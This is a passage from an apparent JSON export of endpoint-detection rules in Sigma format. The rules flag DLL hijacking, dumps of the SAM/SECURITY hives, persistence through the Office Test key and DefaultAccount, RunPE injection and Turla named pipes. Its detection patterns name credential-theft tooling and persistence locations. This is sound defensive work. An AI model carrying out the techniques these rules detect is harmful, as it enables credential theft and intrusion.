"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fhmanagew.yml",
"content": "title: DLL Hijacking via fhmanagew.exe\nid: 798d887e-cd4b-4b6d-8d33-a6fb2f774b7e\ndescription: |\n Detects potential Windows DLL Hijacking via fhmanagew.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fhmanagew.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\fhsvcctl.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "798d887e-cd4b-4b6d-8d33-a6fb2f774b7e",
"rule_name": "DLL Hijacking via fhmanagew.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fhmanagew.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "799ad1f2-f955-49de-b1e0-3750739c3a3b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094900Z",
"creation_date": "2026-03-23T11:45:34.094902Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094907Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-intelligence/clipping-silver-sparrows-wings/",
"https://attack.mitre.org/techniques/T1217/"
],
"name": "t1217_quarantine_discovery_sqlite3.yml",
"content": "title: Quarantine Database Queried via sqlite3\nid: 799ad1f2-f955-49de-b1e0-3750739c3a3b\ndescription: |\n Detects the XProtect's quarantine database being read using sqlite3.\n Adversaries may read the XProtect's quarantine database to check the URL where its payload has been downloaded from.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://redcanary.com/blog/threat-intelligence/clipping-silver-sparrows-wings/\n - https://attack.mitre.org/techniques/T1217/\ndate: 2024/06/12\nmodified: 2025/06/09\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1217\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/sqlite3'\n CommandLine|contains: 'LSQuarantine'\n\n exclusion_firefox:\n ParentImage: '/Applications/Firefox.app/Contents/MacOS/firefox'\n\n exclusion_florp:\n ParentImage: '/Applications/Floorp.app/Contents/MacOS/floorp'\n\n exclusion_beyondtrust:\n ParentImage: '/Library/PrivilegedHelperTools/com.beyondtrust.interrogator'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "799ad1f2-f955-49de-b1e0-3750739c3a3b",
"rule_name": "Quarantine Database Queried via sqlite3",
"rule_description": "Detects the XProtect's quarantine database being read using sqlite3.\nAdversaries may read the XProtect's quarantine database to check the URL where its payload has been downloaded from.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-12",
"rule_modified_date": "2025-06-09",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1217"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "799bf7ed-6853-4d17-898d-d80f3463dd20",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627782Z",
"creation_date": "2026-03-23T11:45:34.627785Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627790Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/002/"
],
"name": "t1003_002_sensitive_reg_save.yml",
"content": "title: SAM or SECURITY Hives Dumped from Registry\nid: 799bf7ed-6853-4d17-898d-d80f3463dd20\ndescription: |\n Detects a registry save to file operation performed on the SAM or SECURITY registry hives.\n The Security Account Manager (SAM) and SECURITY registry hives in Microsoft Windows store sensitive user authentication and security policy information.\n These operations are a common tactic used by attackers to extract sensitive information that can be used for lateral movement.\n It is recommended to verify the legitimacy of the export and check for unusual network connections and authentications to the target machine.\nreferences:\n - https://attack.mitre.org/techniques/T1003/002/\ndate: 2024/06/10\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SaveKey'\n TargetObject|startswith:\n - 'HKLM\\SECURITY'\n - 'HKLM\\SAM'\n\n # This is handled by the rule 90acffa0-c732-46ee-84c6-fd4eafaad163\n filter_secretsdump:\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n HivePath:\n - '?:\\windows\\system32\\\\????????.tmp'\n - '?:\\Windows\\Temp\\\\????????.tmp'\n TargetObject:\n - 'HKLM\\SECURITY'\n - 'HKLM\\SAM'\n\n # This is handled by the rule caa50242-5304-4ee7-8016-d72b99d151af\n filter_donpapi:\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n HivePath:\n - '?:\\windows\\system32\\\\????????????.log'\n - '?:\\Windows\\Temp\\\\????????????.log'\n TargetObject:\n - 'HKLM\\SECURITY'\n - 'HKLM\\SAM'\n\n filter_lsass:\n Image: '?:\\Windows\\System32\\lsass.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\Windows\\Downloaded Program Files\\' # ActiveX\n\n exclusion_bmcsoftware:\n ProcessAncestors|contains: ':\\Program Files\\BMC Software\\BladeLogic\\RSC\\RSCDsvc.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "799bf7ed-6853-4d17-898d-d80f3463dd20",
"rule_name": "SAM or SECURITY Hives Dumped from Registry",
"rule_description": "Detects a registry save to file operation performed on the SAM or SECURITY registry hives.\nThe Security Account Manager (SAM) and SECURITY registry hives in Microsoft Windows store sensitive user authentication and security policy information.\nThese operations are a common tactic used by attackers to extract sensitive information that can be used for lateral movement.\nIt is recommended to verify the legitimacy of the export and check for unusual network connections and authentications to the target machine.\n",
"rule_creation_date": "2024-06-10",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79a1e2a3-10db-45b0-820f-0c1c86c67d8e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089461Z",
"creation_date": "2026-03-23T11:45:34.089463Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089468Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#defaultaccount",
"https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/",
"https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/",
"https://attack.mitre.org/techniques/T1078/001/"
],
"name": "t1078_001_defaultaccount_enabled.yml",
"content": "title: DefaultAccount Account Enabled\nid: 79a1e2a3-10db-45b0-820f-0c1c86c67d8e\ndescription: |\n Detects the activation of the DefaultAccount account, also known as the Default System Managed Account (DSMA).\n This account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\n It is recommended to investigate this action to determine its legitimacy.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#defaultaccount\n - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\n - https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/\n - https://attack.mitre.org/techniques/T1078/001/\ndate: 2023/12/12\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1078.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4722\n TargetSid|endswith: '-503'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79a1e2a3-10db-45b0-820f-0c1c86c67d8e",
"rule_name": "DefaultAccount Account Enabled",
"rule_description": "Detects the activation of the DefaultAccount account, also known as the Default System Managed Account (DSMA).\nThis account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\nIt is recommended to investigate this action to determine its legitimacy.\n",
"rule_creation_date": "2023-12-12",
"rule_modified_date": "2025-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1078.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79ab02be-b5f1-4e8e-a6c0-279428aa8529",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071495Z",
"creation_date": "2026-03-23T11:45:34.071497Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071501Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/",
"https://attack.mitre.org/techniques/T1137/002/"
],
"name": "t1137_002_office_test_key.yml",
"content": "title: Microsoft Office Test Key Created\nid: 79ab02be-b5f1-4e8e-a6c0-279428aa8529\ndescription: |\n Detects the creation of the Office Test key.\n Test keys are used internally by Microsoft while developing Office and should never be set in normal circumstances.\n Office Test registry keys can be used to force Microsoft Office to load DLLs pointed to by the Windows registry and therefore act as a persistence mechanism.\n It is recommended to investigate the process that set the registry value for suspicious activities as well as to analyze the file pointed to by the registry value for malicious content.\n It is also recommended to investigate unsigned DLLs loaded by winword.exe with the name matching the ergistry value and malicious behaviors performed by winword.exe to determine if the persistence mechanism succeeded.\nreferences:\n - https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/\n - https://attack.mitre.org/techniques/T1137/002/\ndate: 2021/06/24\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137.002\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType:\n - 'CreateKey'\n - 'CreateValue'\n - 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\Software\\Microsoft\\Office test\\Special\\Perf\\\\*'\n - 'HKLM\\Software\\Microsoft\\Office test\\Special\\Perf\\\\*'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_windowsupdatebox:\n ProcessParentImage|endswith:\n - '\\WindowsUpdateBox.exe'\n - '\\msiexec.exe'\n Details:\n - '?:\\Program Files (x86)\\Microsoft Readiness Toolkit for Office\\Usage365.dll'\n - '?:\\Program Files (x86)\\Microsoft Readiness Toolkit for Office\\x64\\Usage365.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79ab02be-b5f1-4e8e-a6c0-279428aa8529",
"rule_name": "Microsoft Office Test Key Created",
"rule_description": "Detects the creation of the Office Test key.\nTest keys are used internally by Microsoft while developing Office and should never be set in normal circumstances.\nOffice Test registry keys can be used to force Microsoft Office to load DLLs pointed to by the Windows registry and therefore act as a persistence mechanism.\nIt is recommended to investigate the process that set the registry value for suspicious activities as well as to analyze the file pointed to by the registry value for malicious content.\nIt is also recommended to investigate unsigned DLLs loaded by winword.exe with the name matching the ergistry value and malicious behaviors performed by winword.exe to determine if the persistence mechanism succeeded.\n",
"rule_creation_date": "2021-06-24",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1137.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79c0c417-e8bb-4ab6-9850-abefe4d3b50d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070302Z",
"creation_date": "2026-03-23T11:45:34.070305Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070309Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@coormac/hta-to-net-dll-s-malware-analysis-b7170574331d",
"https://www.virustotal.com/gui/file/132ff32cdc874b28698160c4af6fd87d08c236727d8a952ad3b002d887b209bf",
"https://www.virustotal.com/gui/file/11c215cb0e3ce441efd48d331622dcb714af2e2349b81da8368f5e2f7ad1c951"
],
"name": "t1055_suspicious_runpe_injection.yml",
"content": "title: Suspicious RunPE Injection\nid: 79c0c417-e8bb-4ab6-9850-abefe4d3b50d\ndescription: |\n Detects a suspicious command-line indicative of the RunPE technique used to inject and execute a Portable Executable (PE) file within the memory space of a newly created process.\n This behavior involves creating a suspended process, allocating memory, writing PE headers and sections into the target process, and modifying the thread context to redirect execution.\n This is a common technique used by malware to evade detection and run payloads reflectively in memory.\n It is recommended to investigate the parent process to determine legitimacy as well as to look for other malicious actions on the host.\nreferences:\n - https://medium.com/@coormac/hta-to-net-dll-s-malware-analysis-b7170574331d\n - https://www.virustotal.com/gui/file/132ff32cdc874b28698160c4af6fd87d08c236727d8a952ad3b002d887b209bf\n - https://www.virustotal.com/gui/file/11c215cb0e3ce441efd48d331622dcb714af2e2349b81da8368f5e2f7ad1c951\ndate: 2025/05/16\nmodified: 2025/06/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '#by-unknown'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79c0c417-e8bb-4ab6-9850-abefe4d3b50d",
"rule_name": "Suspicious RunPE Injection",
"rule_description": "Detects a suspicious command-line indicative of the RunPE technique used to inject and execute a Portable Executable (PE) file within the memory space of a newly created process.\nThis behavior involves creating a suspended process, allocating memory, writing PE headers and sections into the target process, and modifying the thread context to redirect execution.\nThis is a common technique used by malware to evade detection and run payloads reflectively in memory.\nIt is recommended to investigate the parent process to determine legitimacy as well as to look for other malicious actions on the host.\n",
"rule_creation_date": "2025-05-16",
"rule_modified_date": "2025-06-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79c1dbfa-d090-429f-85e6-f45fbbbfa7ab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609220Z",
"creation_date": "2026-03-23T11:45:34.609224Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609231Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf",
"https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra",
"https://attack.mitre.org/techniques/T1106/"
],
"name": "t1106_turla_named_pipe_connection.yml",
"content": "title: Named Pipe Connection linked to Turla\nid: 79c1dbfa-d090-429f-85e6-f45fbbbfa7ab\ndescription: |\n Detects the connection to a Named Pipe pertaining to the Turla attacker group.\n The Turla threat group has used specific named pipes for C2 communications and lateral movement within compromised networks.\n It is recommended to monitor for any new lateralization alerts.\nreferences:\n - https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf\n - https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\n - https://attack.mitre.org/techniques/T1106/\ndate: 2022/07/11\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.ThreatActor.Turla\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName:\n - '\\sdlrpc'\n - '\\comnap'\n - '\\iehelper'\n - '\\userpipe'\n - '\\atctl'\n\n condition: selection\nlevel: high\n#level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79c1dbfa-d090-429f-85e6-f45fbbbfa7ab",
"rule_name": "Named Pipe Connection linked to Turla",
"rule_description": "Detects the connection to a Named Pipe pertaining to the Turla attacker group.\nThe Turla threat group has used specific named pipes for C2 communications and lateral movement within compromised networks.\nIt is recommended to monitor for any new lateralization alerts.\n",
"rule_creation_date": "2022-07-11",
"rule_modified_date": "2025-01-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1106",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79dbc640-7be1-4fe3-8549-f832dde6e9dd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589024Z",
"creation_date": "2026-03-23T11:45:34.589027Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589035Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://twitter.com/falsneg/status/1581769422296883200",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_phoneactivate.yml",
"content": "title: DLL Hijacking via phoneactivate.exe\nid: 79dbc640-7be1-4fe3-8549-f832dde6e9dd\ndescription: |\n Detects potential Windows DLL Hijacking via phoneactivate.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://twitter.com/falsneg/status/1581769422296883200\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'phoneactivate.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\rasty_jitter64.dll'\n - '\\rsaenh.dll'\n - '\\slc.dll'\n - '\\sppcext.dll'\n - '\\windows.ui.immersive.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79dbc640-7be1-4fe3-8549-f832dde6e9dd",
"rule_name": "DLL Hijacking via phoneactivate.exe",
"rule_description": "Detects potential Windows DLL Hijacking via phoneactivate.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79f2b027-0261-441e-a1d1-d569515a7c9b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086219Z",
"creation_date": "2026-03-23T11:45:34.086221Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086225Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.reliaquest.com/blog/double-extortion-attack-analysis/",
"https://www.iobit.com/fr/iobit-unlocker.php",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_execution_of_iobitunlocker_driver.yml",
